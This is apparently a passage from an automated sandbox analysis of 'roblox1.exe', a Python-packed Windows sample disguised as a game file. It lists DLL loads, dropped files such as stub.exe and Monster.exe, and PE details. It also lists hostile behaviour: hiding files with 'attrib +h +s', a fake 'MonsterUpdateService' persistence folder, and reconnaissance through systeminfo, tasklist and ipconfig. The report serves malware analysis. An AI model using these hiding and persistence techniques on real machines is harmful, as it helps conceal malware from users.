                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                  Source: C:\Users\user\Desktop\roblox1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: C:\Windows\System32\mshta.exeAutomated click: OK
                  Source: C:\Windows\System32\query.exeAutomated click: OK
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: roblox1.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: roblox1.exeStatic file information: File size 11168256 > 1048576
                  Source: roblox1.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xa85400
                  Source: roblox1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cryptography_rust.pdbc source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ossl_ec_GFp_simple_group_set_curvecrypto\ec\ecp_smpl.cossl_ec_GFp_simple_group_check_discriminantossl_ec_GFp_simple_point_set_affine_coordinatesossl_ec_GFp_simple_point_get_affine_coordinatesossl_ec_GFp_simple_make_affineossl_ec_GFp_simple_points_make_affineossl_ec_GFp_simple_field_invossl_ec_GFp_simple_blind_coordinatescrypto\buffer\buffer.cBUF_MEM_growBUF_MEM_grow_cleancompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap` source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301567000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1953260784.00007FFBA9EE5000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_uuid.pdb source: stub.exe, 00000003.00000002.1965068421.00007FFBBBE92000.00000002.00000001.01000000.00000020.sdmp
                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: roblox1.exe, 00000000.00000003.1539994673.000001B3013F1000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1954163213.00007FFBAA16F000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\python3.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945909540.00000213BE720000.00000002.00000001.01000000.0000000E.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_ctypes.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1965877888.00007FFBBC260000.00000002.00000001.01000000.00000007.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: stub.exe, 00000003.00000002.1964238411.00007FFBBB553000.00000002.00000001.01000000.00000025.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_sqlite3.pdb source: stub.exe, 00000003.00000002.1964051788.00007FFBBAF4C000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\python310.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1961361267.00007FFBAAD33000.00000002.00000001.01000000.00000005.sdmp
                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: roblox1.exe, 00000000.00000003.1539994673.000001B3013F1000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1954163213.00007FFBAA16F000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: k1k2k3X9_62_PENTANOMIALp.otherp.onBasisp.tpBasisp.ppBasismX9_62_CHARACTERISTIC_TWOp.primep.char_twofieldTypeX9_62_FIELDIDX9_62_CURVEfieldIDcurvebaseECPARAMETERSvalue.named_curvevalue.parametersvalue.implicitlyCAECPKPARAMETERSprivateKeyparameterspublicKeyEC_PRIVATEKEYec_asn1_group2fieldidcrypto\ec\ec_asn1.cec_asn1_group2curveEC_GROUP_get_ecparametersEC_GROUP_get_ecpkparametersEC_GROUP_new_from_ecparametersEC_GROUP_new_from_ecpkparametersi2d_ECPKParametersd2i_ECPrivateKeyi2d_ECPrivateKeyi2d_ECParametersd2i_ECParameterso2i_ECPublicKeyi2o_ECPublicKeycompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.3.2built on: Tue Sep 3 19:22:24 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_asyncio.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1963452510.00007FFBB5C17000.00000002.00000001.01000000.00000015.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\select.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1966370178.00007FFBBC9F3000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1952475865.00007FFBA9E5C000.00000002.00000001.01000000.00000019.sdmp
                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: roblox1.exe, 00000000.00000003.1539994673.000001B301567000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1953260784.00007FFBA9EE5000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_ssl.pdb source: stub.exe, 00000003.00000002.1963629139.00007FFBB5CBD000.00000002.00000001.01000000.00000012.sdmp, stub.exe, 00000003.00000003.1552093383.00000213BE4C3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cryptography_rust.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: stub.exe, 00000003.00000002.1965708695.00007FFBBC246000.00000002.00000001.01000000.00000018.sdmp
                  Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: stub.exe, 00000003.00000002.1954163213.00007FFBAA1F1000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\pyexpat.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp
                  Source: vcruntime140.dll.0.drStatic PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]
                  Source: roblox1.exeStatic PE information: section name: .eh_fram
                  Source: roblox1.exeStatic PE information: section name: .xdata
                  Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
                  Source: libssl-1_1.dll.0.drStatic PE information: section name: .00cfg
                  Source: stub.exe.0.drStatic PE information: section name: .eh_fram
                  Source: stub.exe.0.drStatic PE information: section name: .xdata
                  Source: python310.dll.0.drStatic PE information: section name: PyRuntim
                  Source: vcruntime140.dll.0.drStatic PE information: section name: _RDATA
                  Source: Monster.exe.3.drStatic PE information: section name: .eh_fram
                  Source: Monster.exe.3.drStatic PE information: section name: .xdata
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 56_2_00007FFB496400BD pushad ; iretd 56_2_00007FFB496400C1

                  Persistence and Installation Behavior

                  barindex
                  Uses attrib.exe to hide files
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe"
                  Uses ipconfig to lookup or modify the Windows network settings
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_asyncio.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_lzma.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_hashlib.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\yarl\_helpers_c.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_helpers.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\pyexpat.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\frozenlist\_frozenlist.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\multidict\_multidict.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\python3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ssl.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\libssl-1_1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_sqlite3.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\libffi-7.dllJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_http_writer.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_queue.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_multiprocessing.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\python310.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile created: C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exeJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_decimal.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_overlapped.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\libcrypto-1_1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\yarl\_quoting_c.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_cffi_backend.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_bz2.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_uuid.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\vcruntime140.dllJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_http_parser.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ctypes.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\unicodedata.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_websocket.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_socket.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\sqlite3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\select.pydJump to dropped file
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
